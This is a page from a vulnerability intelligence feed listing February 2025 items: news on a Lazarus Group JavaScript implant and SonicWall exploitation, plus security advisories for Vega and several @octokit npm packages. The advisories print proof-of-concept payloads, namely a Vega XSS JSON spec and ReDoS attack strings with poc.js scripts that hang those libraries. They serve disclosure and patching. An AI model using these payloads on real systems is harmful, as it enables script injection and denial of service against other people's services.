CyberAlerts is shutting down on June 30th, 2025. Thank you for your support!
Threat and Vulnerability Intelligence Database
Example Searches:
CVE
Threat Actors
Countries
Vendors
Severity
Known Exploited
|
Description: The North Korean threat actor known as the Lazarus Group has been linked to a previously undocumented JavaScript implant named Marstech1 as part of limited targeted attacks against developers.
The active operation has been dubbed Marstech Mayhem by SecurityScorecard, with the malware delivered by means of an open-source repository hosted on GitHub that's associated with a profile named "
February 14th, 2025 (5 months ago)
|
|
|
Description: Credible Security's founders bring their varied experiences to help growing companies turn trust into a strategic advantage.
February 14th, 2025 (5 months ago)
|
|
|
Description: FDA and HHS sites now note that “The Trump Administration rejects gender ideology and condemns the harms it causes to children.”
February 14th, 2025 (5 months ago)
|
|
|
Description: Summary
The vlSelectionTuples function can be used to call JavaScript functions, leading to XSS.
Details
vlSelectionTuples calls multiple functions that can be controlled by an attacker, including one call with an attacker-controlled argument.
Example call: vlSelectionTuples([{datum:}], {fields:[{getter:}]})
This can be used to call Function() with arbitrary JavaScript and the resulting function can be called with vlSelectionTuples or using a type coercion to call toString or valueOf.
PoC
{"$schema":"https://vega.github.io/schema/vega/v5.json","signals":[{"name":"a","init":"+{valueOf:vlSelectionTuples([{datum:'alert(1)'}],{fields:[{getter:[].at.constructor}]})[0].values[0]}"}]}
References
https://github.com/vega/vega/security/advisories/GHSA-mp7w-mhcv-673j
https://github.com/vega/vega/commit/9fb9ea07e27984394e463d286eb73944fa61411e
https://github.com/advisories/GHSA-mp7w-mhcv-673j
February 14th, 2025 (5 months ago)
|
|
|
Description: Summary
The vlSelectionTuples function can be used to call JavaScript functions, leading to XSS.
Details
vlSelectionTuples calls multiple functions that can be controlled by an attacker, including one call with an attacker-controlled argument.
Example call: vlSelectionTuples([{datum:}], {fields:[{getter:}]})
This can be used to call Function() with arbitrary JavaScript and the resulting function can be called with vlSelectionTuples or using a type coercion to call toString or valueOf.
PoC
{"$schema":"https://vega.github.io/schema/vega/v5.json","signals":[{"name":"a","init":"+{valueOf:vlSelectionTuples([{datum:'alert(1)'}],{fields:[{getter:[].at.constructor}]})[0].values[0]}"}]}
References
https://github.com/vega/vega/security/advisories/GHSA-mp7w-mhcv-673j
https://github.com/vega/vega/commit/9fb9ea07e27984394e463d286eb73944fa61411e
https://github.com/advisories/GHSA-mp7w-mhcv-673j
February 14th, 2025 (5 months ago)
|
|
|
Description: Summary
By crafting specific options parameters, the endpoint.parse(options) call can be triggered, leading to a regular expression denial-of-service (ReDoS) attack. This causes the program to hang and results in high CPU utilization.
Details
The issue occurs in the parse function within the parse.ts file of the npm package @octokit/endpoint. The specific code is located at the following link: https://github.com/octokit/endpoint.js/blob/main/src/parse.ts, at line 62:
headers.accept.match(/[\w-]+(?=-preview)/g) || ([] as string[]);
The regular expression /[\w-]+(?=-preview)/g encounters a backtracking issue when it processes a large number of characters followed by the - symbol.
e.g., the attack string:
"" + "A".repeat(100000) + "-"
PoC
The gist
Here is the reproduction process for the vulnerability:
run 'npm i @octokit/endpoint'
Move poc.js to the root directory of the same level as README.md
run 'node poc.js'
result:
then the program will stuck forever with high CPU usage
import { endpoint } from "@octokit/endpoint";
// import { parse } from "./node_modules/@octokit/endpoint/dist-src/parse.js";
const options = {
method: "POST",
url: "/graphql", // Ensure that the URL ends with "/graphql"
headers: {
accept: "" + "A".repeat(100000) + "-", // Pass in the attack string
"content-type": "text/plain",
},
mediaType: {
previews: ["test-preview"], // Ensure that mediaType.previews exists and has values
format: "raw", // Optional media format
},
...
February 14th, 2025 (5 months ago)
|
|
|
Description: Summary
For the npm package @octokit/plugin-paginate-rest, when calling octokit.paginate.iterator(), a specially crafted octokit instance—particularly with a malicious link parameter in the headers section of the request—can trigger a ReDoS attack.
Details
The issue occurs at line 39 of iterator.ts in the @octokit/plugin-paginate-rest repository. The relevant code is as follows:
url = ((normalizedResponse.headers.link || "").match(
/<([^>]+)>;\s*rel="next"/,
) || [])[1];
The regular expression /<([^>]+)>;\s*rel="next"/ may lead to a potential backtracking vulnerability, resulting in a ReDoS (Regular Expression Denial of Service) attack. This could cause high CPU utilization and even service slowdowns or freezes when processing specially crafted Link headers.
PoC
The gist of PoC.js
run npm i @octokit/plugin-paginate-rest
run 'node poc.js'
result:
then the program will stuck forever with high CPU usage
import { Octokit } from "@octokit/core";
import { paginateRest } from "@octokit/plugin-paginate-rest";
const MyOctokit = Octokit.plugin(paginateRest);
const octokit = new MyOctokit({
auth: "your-github-token",
});
// Intercept the request to inject a malicious 'link' header for ReDoS
octokit.hook.wrap("request", async (request, options) => {
const maliciousLinkHeader = "" + "<".repeat(100000) + ">"; // attack string
return {
data: [],
headers: {
link: maliciousLinkHeader, // Inject malicious 'link' header
},
};
});
// Trigger the ReDoS attack ...
February 14th, 2025 (5 months ago)
|
|
|
Description: Summary
A Regular Expression Denial of Service (ReDoS) vulnerability exists in the processing of HTTP request headers. By sending an authorization header containing an excessively long sequence of spaces followed by a newline and "@", an attacker can exploit inefficient regular expression processing, leading to excessive resource consumption. This can significantly degrade server performance or cause a denial-of-service (DoS) condition, impacting availability.
Details
The issue occurs at line 52 of iterator.ts in the @octokit/request-error repository.
The vulnerability is caused by the use of an inefficient regular expression in the handling of the authorization header within the request processing logic:
authorization: options.request.headers.authorization.replace(
/ .*$/,
" [REDACTED]"
)
The regular expression / .*$/ matches a space followed by any number of characters until the end of the line. This pattern is vulnerable to Regular Expression Denial of Service (ReDoS) when processing specially crafted input. Specifically, an attacker can send an authorization header containing a long sequence of spaces followed by a newline and "@", such as:
headers: {
authorization: "" + " ".repeat(100000) + "\n@",
}
Due to the way JavaScript's regular expression engine backtracks while attempting to match the space followed by arbitrary characters, this input can cause excessive CPU usage, significantly slowing down or even freezing the server. This leads to a denial-of-servi...
February 14th, 2025 (5 months ago)
|
|
|
Description: Summary
The regular expression /<([^>]+)>; rel="deprecation"/ used to match the link header in HTTP responses is vulnerable to a ReDoS (Regular Expression Denial of Service) attack. This vulnerability arises due to the unbounded nature of the regex's matching behavior, which can lead to catastrophic backtracking when processing specially crafted input. An attacker could exploit this flaw by sending a malicious link header, resulting in excessive CPU usage and potentially causing the server to become unresponsive, impacting service availability.
Details
The vulnerability resides in the regular expression /<([^>]+)>; rel="deprecation"/, which is used to match the link header in HTTP responses. This regular expression captures content between angle brackets (<>) followed by ; rel="deprecation". However, the pattern is vulnerable to ReDoS (Regular Expression Denial of Service) attacks due to its susceptibility to catastrophic backtracking when processing malicious input.
An attacker can exploit this vulnerability by sending a specially crafted link header designed to trigger excessive backtracking. For example, the following headers:
fakeHeaders.set("link", "<".repeat(100000) + ">");
fakeHeaders.set("deprecation", "true");
The crafted link header consists of 100,000 consecutive < characters followed by a closing >. This input forces the regular expression engine to backtrack extensively in an attempt to match the pattern. As a result, the server can experience a significant i...
February 14th, 2025 (5 months ago)
|
|
|
Description: Attackers are now targeting an authentication bypass vulnerability affecting SonicWall firewalls shortly after the release of proof-of-concept (PoC) exploit code. [...]
February 14th, 2025 (5 months ago)
|